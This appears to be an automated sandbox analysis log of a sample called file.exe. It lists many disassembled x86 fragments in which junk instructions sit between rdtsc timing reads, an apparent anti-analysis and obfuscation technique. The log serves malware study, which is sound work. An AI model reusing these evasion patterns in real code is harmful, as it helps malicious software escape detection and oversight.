Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299916 second address: 1299942 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849C4F2D9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F849C4F2DA8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299942 second address: 1299957 instructions: 0x00000000 rdtsc 0x00000002 je 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299957 second address: 1299985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jns 00007F849C4F2D96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 je 00007F849C4F2D9Ch 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jp 00007F849C4F2DA2h 0x00000026 jbe 00007F849C4F2D9Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299BD6 second address: 1299BE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F849CDA41FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299C93 second address: 1299C98 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299C98 second address: 1299CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jo 00007F849CDA41F6h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129A4F9 second address: 129A515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edx, di 0x0000000c lea eax, dword ptr [ebp+1247AF19h] 0x00000012 sbb dh, 0000001Ah 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 push esi 0x0000001a pop esi 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129A515 second address: 129A51F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F849CDA41FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129A51F second address: 129A548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnc 00007F849C4F2D9Ch 0x0000000e jng 00007F849C4F2D96h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F849C4F2DA3h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129A548 second address: 129A58C instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+122D2EC6h], esi 0x00000012 lea eax, dword ptr [ebp+1247AED5h] 0x00000018 jmp 00007F849CDA4201h 0x0000001d nop 0x0000001e jg 00007F849CDA41FCh 0x00000024 push eax 0x00000025 pushad 0x00000026 jne 00007F849CDA41F8h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129A58C second address: 129A590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CD986 second address: 12CD98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CDAF4 second address: 12CDB06 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F849C4F2D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F849C4F2D9Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CDB06 second address: 12CDB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CDB0C second address: 12CDB33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Bh 0x00000007 pushad 0x00000008 jc 00007F849C4F2D96h 0x0000000e jmp 00007F849C4F2D9Fh 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CDB33 second address: 12CDB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849CDA41FBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CDB47 second address: 12CDB4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5294 second address: 12D5299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5299 second address: 12D529F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D529F second address: 12D52B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA41FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D587F second address: 12D5884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5884 second address: 12D58B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4200h 0x00000007 jmp 00007F849CDA4202h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D58B0 second address: 12D58BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D58BB second address: 12D58D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849CDA41FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F849CDA41F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5A2A second address: 12D5A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5A2E second address: 12D5A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F849CDA4204h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5EB3 second address: 12D5EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Ch 0x00000007 jmp 00007F849C4F2DA8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5EE1 second address: 12D5EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F849CDA41FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D6021 second address: 12D605B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007F849C4F2D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebx 0x0000000e jmp 00007F849C4F2DA5h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F849C4F2DA3h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D62D1 second address: 12D62FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4207h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d jo 00007F849CDA41FEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFBA6 second address: 12DFBAC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFE5E second address: 12DFE8D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F849CDA41F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F849CDA4202h 0x00000012 jmp 00007F849CDA41FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFE8D second address: 12DFE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFE92 second address: 12DFEC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CDA4207h 0x00000009 jmp 00007F849CDA4209h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFEC6 second address: 12DFEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F849C4F2DA4h 0x00000014 je 00007F849C4F2D96h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFEFE second address: 12DFF0C instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFF0C second address: 12DFF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFF10 second address: 12DFF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFF14 second address: 12DFF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFF1A second address: 12DFF20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFF20 second address: 12DFF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F849C4F2D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E00AE second address: 12E00B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E0380 second address: 12E0384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E0384 second address: 12E03A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4206h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E03A0 second address: 12E03B0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F849C4F2DA2h 0x00000008 jbe 00007F849C4F2D96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E03B0 second address: 12E03C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F849CDA41FBh 0x0000000b jo 00007F849CDA41F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E0519 second address: 12E051D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E051D second address: 12E0527 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E0527 second address: 12E052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E052B second address: 12E052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E084D second address: 12E0857 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F849C4F2D9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E0857 second address: 12E087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F849CDA4204h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E0DEA second address: 12E0E09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F849C4F2D9Eh 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E3F4F second address: 12E3F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E3F53 second address: 12E3F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E4081 second address: 12E4085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E4085 second address: 12E408B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E408B second address: 12E4091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E6466 second address: 12E647F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Ch 0x00000007 ja 00007F849C4F2D96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EB5D5 second address: 12EB5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F849CDA41F6h 0x0000000a popad 0x0000000b jmp 00007F849CDA4203h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EA898 second address: 12EA8B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849C4F2DA0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EA8B1 second address: 12EA8B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EA8B7 second address: 12EA8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EA8BB second address: 12EA8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAA66 second address: 12EAA80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F849C4F2DA3h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EABEB second address: 12EABF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EABF1 second address: 12EAC1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F849C4F2D98h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAC1D second address: 12EAC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA41FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAFE7 second address: 12EAFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAFEB second address: 12EAFEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAFEF second address: 12EAFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F849C4F2D9Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EB188 second address: 12EB199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jng 00007F849CDA41F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EB199 second address: 12EB19F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EB19F second address: 12EB1B6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F849CDA41F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jc 00007F849CDA41F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EE185 second address: 12EE18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EE18B second address: 12EE198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F849CDA41F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4E23 second address: 12F4E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F849C4F2DA7h 0x0000000a jmp 00007F849C4F2DA4h 0x0000000f popad 0x00000010 jl 00007F849C4F2DA2h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F37E8 second address: 12F37F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F37F6 second address: 12F37FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F37FB second address: 12F380A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 jc 00007F849CDA41FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F380A second address: 12F3830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F849C4F2DA6h 0x0000000d jl 00007F849C4F2D98h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F3830 second address: 12F3837 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F3965 second address: 12F397E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F849C4F2D9Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299F2F second address: 1299F3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299F3D second address: 1299F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299F41 second address: 1299F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1299F47 second address: 1299FE9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849C4F2DA1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc dx, F44Dh 0x00000010 mov ebx, dword ptr [ebp+1247AF14h] 0x00000016 add edx, dword ptr [ebp+122D1980h] 0x0000001c add eax, ebx 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F849C4F2D98h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 add cl, 00000001h 0x0000003b push eax 0x0000003c jns 00007F849C4F2DACh 0x00000042 mov dword ptr [esp], eax 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007F849C4F2D98h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 00000018h 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f mov dword ptr [ebp+122D26DDh], esi 0x00000065 push 00000004h 0x00000067 mov edx, dword ptr [ebp+122D19FEh] 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 push edx 0x00000072 pop edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F3EFB second address: 12F3F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4202h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F849CDA4206h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4071 second address: 12F4075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB1EB second address: 12FB1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB1EF second address: 12FB1F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FB1F7 second address: 12FB1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
